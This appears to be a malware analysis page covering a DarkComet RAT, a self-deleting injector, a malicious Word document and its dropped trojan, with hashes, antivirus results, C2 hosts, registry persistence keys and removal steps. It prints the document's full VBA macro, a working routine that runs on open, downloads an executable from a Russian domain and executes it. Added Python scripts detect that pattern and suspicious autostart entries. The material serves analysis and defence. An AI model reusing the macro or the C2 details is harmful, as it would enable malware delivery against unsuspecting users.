Malware analysis

looking for the perfect virus
ForceOp.exe

File name: ForceOp.exe
MD5: 2b006dd5d496c7ad7040d5c8efab0240
SHA-1: 6b4070a5ee59dbc30a71d766442f52fbad6de4ab
Size: 1.82 MB (1,917,440 bytes)

Antivirus detection:

MD5: 2b006dd5d496c7ad7040d5c8efab0240
Verified By NoDistribute: http://NoDistribute.com/result/4YgI3DlXP7M2oJA9

AVG Free: Trojan horse Autoit_c.ATDC
Avast: Win32:Malware-gen
AntiVir (Avira): DR/AutoIt.Gen2
BitDefender: Trojan.GenericKD.1716380
Clam Antivirus: Win.Trojan.11477628
COMODO Internet Security: Malware@fya0u6p5xw7s
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan.GenericKD.1716380
G Data: Trojan.GenericKD.1716380
IKARUS Security: Backdoor.Win32.DarkKomet
Kaspersky Antivirus: Clean
McAfee: Artemis!2B006DD5D496
MS Security Essentials: Clean
Norman: winpe/Troj_Generic.UOKHC
Norton Antivirus: Clean
Panda Security: Clean
A-Squared: Trojan.GenericKD.1716380 (B)
Quick Heal Antivirus: Backdoor.DarkKomet.g5
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: INFECTED [Trojan.Autoit.NPP]
Ad-Aware: Trojan.GenericKD.1716380
BullGuard: Trojan.GenericKD.1716380
FortiClient: Clean
K7 Ultimate: Trojan ( 00492e361 )
NANO Antivirus: Trojan.Win32.DarkKomet.dbaajp
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Trojan.264FEF29B6FC0C72
VIPRE: Trojan.Win32.Generic=21BT

process:
ForceOp.exe
IPOR.exe (C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe)

network activity:
slothyster.no-ip.biz, TCP port 1604

persistence:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe c:\documents and settings\administrator\my documents\jeva\ipor.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
Apple Posh C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe
Jerva C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Apple Posh C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe

new files:
C:\Documents and Settings\Administrator\Application Data\dclogs\
2014-07-17-5.dc

C:\Documents and Settings\Administrator\My Documents\JEVA\
IPOR.exe MD5: 2b006dd5d496c7ad7040d5c8efab0240 (identical to ForceOp.exe: same MD5)

malware type: DarkComet, keylogger, RAT, info-stealer

removal:
kill the ForceOp.exe/IPOR.exe process
remove the persistence entries listed above from the registry (Winlogon\Userinit and the Run keys)
delete C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe

Avis.de.Paiement.scr

File name: Avis.de.Paiement.scr
MD5: 66dcf2e32aa902e2ffd4c06f5cb23b43
SHA-1: 3a2bbef2c1656f763ab74b35446a605aef72e52c

CompanyName: Arcom
FileDescription: Arcoms Application
FileVersion: 1, 1, 2, 1
InternalName: Arcom
LegalCopyright: Copyright Dejaneyro (C) 2013
LegalTrademarks:
OriginalFilename: Arcoms.exe
ProductName: Arcoms Application
ProductVersion: 1, 1, 2, 1

Antivirus detection:

Scan Result: 1/34
Verified By NoDistribute: http://NoDistribute.com/result/p6qdWSf0vTsr8

AVG Free: Clean
Avast: Win32:Evo-gen [Susp]
AntiVir (Avira): Clean
BitDefender: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: Clean
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Clean
G Data: Clean
IKARUS Security: Clean
Kaspersky Antivirus: Clean
McAfee: Clean
MS Security Essentials: Clean
Norman: Clean
Norton Antivirus: Clean
Panda Security: Clean
A-Squared: Clean
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Clean
FortiClient: Clean
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
SUPERAntiSpyware: Clean
Twister Antivirus: Clean
VIPRE: Clean

behaviour: self-deletes

process:
injects into msiexec.exe (C:\WINDOWS\system32\msiexec.exe)

new files:
C:\Documents and Settings\All Users\
msbbfvw.exe MD5: 66dcf2e32aa902e2ffd4c06f5cb23b43 (identical to Avis.de.Paiement.scr: same MD5)

network:
disk57.com/gate.php
User-Agent: Mozilla/4.0

persistence:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
1080726116 REG_SZ C:\DOCUME~1\ALLUSE~1\msbbfvw.exe

removal instructions:
suspend explorer.exe and msiexec.exe
kill explorer.exe and msiexec.exe
go to C:\Documents and Settings\All Users\

attrib -s -h msbbfvw.exe

delete msbbfvw.exe
use Sysinternals Autoruns to delete the persistence entry

File name: Order_230614.Doc
MD5: 08c458d4a35d2c2dbd61ea1ed585378c
SHA-1: 3fbdecab968c1dd3619ff0d34c006606b461a509
Size: 46.5 KB (47,616 bytes)

Order_230614.doc

Macros warning

Antivirus detection:

File Name: Order_230614.Doc
File Size: 46.5 KB
Scan Date: 2014-06-25
Scan Result: 13/34

MD5: 08c458d4a35d2c2dbd61ea1ed585378c
Verified By NoDistribute: http://NoDistribute.com/result/KSqv8wZ7efyXpDO

AVG Free: Clean
ArcaVir: Clean
Avast: Clean
AntiVir (Avira): Clean
BitDefender: Trojan.Downloader.JQUA
Clam Antivirus: Clean
COMODO Internet Security: Clean
Dr.Web: W97M.DownLoader.26
eTrust-Vet: Tnega.XASO!suspicious
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan-Downloader:W32/Agent.DUZS
G Data: Trojan.Downloader.JQUA
IKARUS Security: Trojan-Downloader.W97M.Adodb
Kaspersky Antivirus: Trojan-Downloader.MSWord.Agent.ac
McAfee: Clean
MS Security Essentials: TrojanDownloader:W97M/Adobdocro.A
Norman: Clean
Norton Antivirus: Trojan.Mdropper
Panda Security: Clean
A-Squared: Trojan-Downloader.MsWord.Macdrop (A)
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: WM97/Agent-AFRS
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Trojan.Downloader.JQUA
FortiClient: MSOffice/Agent.E!tr
K7 Ultimate: Clean
NANO Antivirus: Clean
Panda CommandLine: Clean
Twister Antivirus: Clean
VIPRE: Clean

Extracted Macros:

' Auto_Open, AutoOpen and Workbook_Open all call h(), so the payload runs
' as soon as the document is opened with macros enabled.
Sub Auto_Open()
    h
End Sub

Sub h()
    ' %USERPROFILE%\q is the staging directory for the downloaded payload
    Set oShell = CreateObject("WScript.Shell")
    strH = oShell.ExpandEnvironmentStrings("%USERPROFILE%")
    Dim sDir: sDir = strH & "\q"

    ' Fetch info.exe over plain HTTP (oHTTP is created but never used)
    Dim oHTTP: Set oHTTP = CreateObject("MSXML2.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    xHttp.Open "GET", "http://barniefilm1996.ru/info.exe", False
    xHttp.Send

    ' Write the response body to disk as a binary stream, renamed to q.com
    With bStrm
        .Type = 1
        .Open
        .write xHttp.responseBody
        .savetofile strH & "\q\q.com", 2
    End With

    ' Execute whatever is in the staging directory
    Call m(sDir)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

' Runs every file found in str11 via WScript.Shell, waiting for each to exit
Function m(str11)
    Dim fso, f, fc, f1, strF, intFiles
    Dim WshShell

    Set WshShell = CreateObject("WScript.Shell")

    strF = ""

    Set fso = CreateObject("Scripting.FileSystemObject")
    If (fso.FolderExists(str11)) Then
        Set f = fso.GetFolder(str11)
        Set fc = f.Files

        For Each f1 In fc
            Dim fR
            fR = str11 & "\" & f1.Name
            WshShell.Run Chr(34) & fR & Chr(34), 1, True
        Next

        Set f1 = Nothing
        Set fc = Nothing
        Set f = Nothing
    End If
    Set fso = Nothing
End Function
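As an added example (not part of the original post), a small Python triage script that flags the download-and-execute pattern in the macro above: an auto-exec entry point, an XMLHTTP client, an Adodb.Stream write to disk and a WScript.Shell run. The embedded macro text is a constructed excerpt of the listing above; the COM object name lists are assumptions covering the common variants.

```python
import re

# Constructed sample: the key lines of the Order_230614.doc macro listed above
SAMPLE_MACRO = r'''
Sub Auto_Open()
    h
End Sub
Sub h()
Set oShell = CreateObject("WScript.Shell")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
xHttp.Open "GET", "http://barniefilm1996.ru/info.exe", False
With bStrm
    .savetofile strH & "\q\q.com", 2
End With
Call m(sDir)
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Function m(str11)
    WshShell.Run Chr(34) & fR & Chr(34), 1, True
End Function
'''

# VBA is case-insensitive, so everything is compared in lower case (assumed lists)
AUTOEXEC = {"auto_open", "autoopen", "workbook_open", "document_open"}
HTTP_OBJECTS = {"microsoft.xmlhttp", "msxml2.xmlhttp", "msxml2.serverxmlhttp"}
EXEC_OBJECTS = {"wscript.shell", "shell.application"}

def triage_vba(src):
    """Static triage of VBA source: collect auto-exec entry points, COM objects,
    URLs, file writes and shell runs, and flag the full download-and-execute
    chain (auto-run + HTTP client + write to disk + execution) when present."""
    procs = {p.lower() for p in re.findall(r"^\s*(?:Sub|Function)\s+(\w+)", src, re.M | re.I)}
    objects = {o.lower() for o in re.findall(r'CreateObject\("([^"]+)"\)', src, re.I)}
    urls = re.findall(r'"(https?://[^"]+)"', src, re.I)
    saves = [s.strip() for s in re.findall(r"\.savetofile\s+([^,]+)", src, re.I)]
    runs = re.findall(r"\.Run\s+(.+)$", src, re.M | re.I)
    chain = {
        "autoexec": bool(procs & AUTOEXEC),
        "http": bool(objects & HTTP_OBJECTS),
        "write": bool(saves) and "adodb.stream" in objects,
        "exec": bool(runs) and bool(objects & EXEC_OBJECTS),
    }
    return {"entry_points": sorted(procs & AUTOEXEC), "objects": sorted(objects),
            "urls": urls, "save_targets": saves, "chain": chain,
            "download_and_execute": all(chain.values())}
```

Run it on olevba or oledump output for a suspect document; a hit on all four chain elements is a strong signal, a partial hit still lists the URLs and write targets for manual review.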

File name: info.exe
MD5: 49ee7488e5a3d6d72041b94575a649bc
SHA-1: 78777b3675402c046355239f41fdfdf5e8e89b67
Size: 281 KB (288,379 bytes)

info.exe

CompanyName: Speedy Softwares
ProductVersion: 8
FileVersion: 8, 2, 6
InternalName: Ohy
LegalTrademarks: Gap Didihu Awusuki Ikulav Yqesysy Beje Nyzaze Caticot Umuno Nyh
LegalCopyright: 1995
OriginalFilename: Geqpeevn.exe
ProductName: Kofuju
FileDescription: Pikusy Aqugik Ewimy

behaviour: self-deletes

Antivirus detection:

File Name: info.exe_
File Size: 281.62 KB
Scan Date: 2014-06-25
Scan Result: 18/34

MD5: 49ee7488e5a3d6d72041b94575a649bc
Verified By NoDistribute: http://NoDistribute.com/result/F9wl6vdLafb

AVG Free: Trojan horse Agent4.BXRH
ArcaVir: Clean
Avast: Win32:Malware-gen
AntiVir (Avira): TR/Agent.288379
BitDefender: Trojan.GenericKD.1728294
Clam Antivirus: Clean
COMODO Internet Security: Malware@1i1va7v5h3yae
Dr.Web: Trojan.KeyLogger.25202
eTrust-Vet: Clean
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan.GenericKD.1728294
G Data: Trojan.GenericKD.1728294
IKARUS Security: Trojan.Agent
Kaspersky Antivirus: Trojan.Win32.Agent.icpx
McAfee: Artemis!49EE7488E5A3
MS Security Essentials: Clean
Norman: winpe/Agent.BDRDH
Norton Antivirus: Trojan.Zbot
Panda Security: Clean
A-Squared: Trojan.Win32.Agent (A)
Quick Heal Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
BullGuard: Trojan.GenericKD.1728294
FortiClient: W32/Agent.WBC!tr
K7 Ultimate: Trojan ( 0049bb751 )
NANO Antivirus: Clean
Panda CommandLine: Clean
Twister Antivirus: Clean
VIPRE: Trojan.Win32.Generic=21B

process:
osuninst.exe (C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe)
rasdial.exe (C:\Documents and Settings\Administrator\Local Settings\Temp\rasdial.exe)

new files:
C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\
osuninst.exe MD5 dacc19c5ea1596b2550b81b1c9f5bab1

C:\Documents and Settings\Administrator\Local Settings\Temp\
rasdial.exe MD5 52303dc6f013ef3b0c37bba6817424f2

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\
osuninst.lnk

network:
www.livejournal.com/search/?how=tm&area=default&q=8199291E1084C21B HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

registry:
HKEY_CURRENT_USER\Control Panel\Desktop\
SCRNSAVE.EXE REG_SZ "C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"

HKEY_CURRENT_USER\Software\Microsoft\Command Processor\
AutoRun REG_SZ "C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
Run REG_SZ "C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"

persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
osuninst REG_SZ "C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\
osuninst REG_SZ "C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"

C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\
osuninst.lnk
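As an added example (not from the original post) covering the persistence sections and removal steps of all three samples: a Python triage of registry autostart entries that reports which values point into user-writable locations and so need removing. The entries are constructed from this page's persistence sections plus the XP Userinit default as a benign control; the autostart key list and the profile-path patterns are assumptions, not an exhaustive ASEP list.

```python
import re

# Constructed sample: the persistence entries above plus the benign XP Userinit default
SAMPLE_ENTRIES = [
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit",
     r"C:\WINDOWS\system32\userinit.exe,"),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit",
     r"C:\Documents and Settings\Administrator\My Documents\JEVA\IPOR.exe "
     r"c:\documents and settings\administrator\my documents\jeva\ipor.exe"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run",
     "1080726116", r"C:\DOCUME~1\ALLUSE~1\msbbfvw.exe"),
    (r"HKCU\Control Panel\Desktop", "SCRNSAVE.EXE",
     r'"C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"'),
    (r"HKCU\Software\Microsoft\Command Processor", "AutoRun",
     r'"C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\osuninst.exe"'),
]

# key suffixes / value names consulted at logon or process start (assumed, not exhaustive)
AUTOSTART_KEYS = (r"\currentversion\run", r"\currentversion\runonce",
                  r"\policies\explorer\run", r"\winlogon",
                  r"\command processor", r"\control panel\desktop")
AUTOSTART_VALUES = {"userinit", "shell", "autorun", "scrnsave.exe"}
# directories a non-admin user can write to; nothing there should autostart
PROFILE_PATH = re.compile(
    r"documents and settings\\|docume~1\\|\\users\\|\\temp\\|application data", re.I)

def extract_paths(data):
    """Split a value into paths: Userinit is a comma list, the DarkComet
    sample appends a second path after a space, info.exe quotes its path."""
    parts = re.split(r",|\s(?=[a-z]:\\)", data, flags=re.I)
    return [p.strip().strip('"') for p in parts if p.strip()]

def triage(entries):
    """Return (key, value name, suspicious paths) for autostart entries that
    point into a profile/temp directory; Userinit must be exactly system32's."""
    findings = []
    for key, name, data in entries:
        k, n = key.lower(), name.lower()
        if not (k.endswith(AUTOSTART_KEYS) or n in AUTOSTART_VALUES):
            continue
        paths = extract_paths(data)
        if n == "userinit":
            bad = [p for p in paths if not p.lower().endswith(r"\system32\userinit.exe")]
            if bad or len(paths) != 1:
                findings.append((key, name, bad or paths))
            continue
        bad = [p for p in paths if PROFILE_PATH.search(p)]
        if bad:
            findings.append((key, name, bad))
    return findings
```

Feed it the (key, name, data) triples from a registry export or an Autoruns CSV; each finding is one value to delete after the process holding the file has been killed.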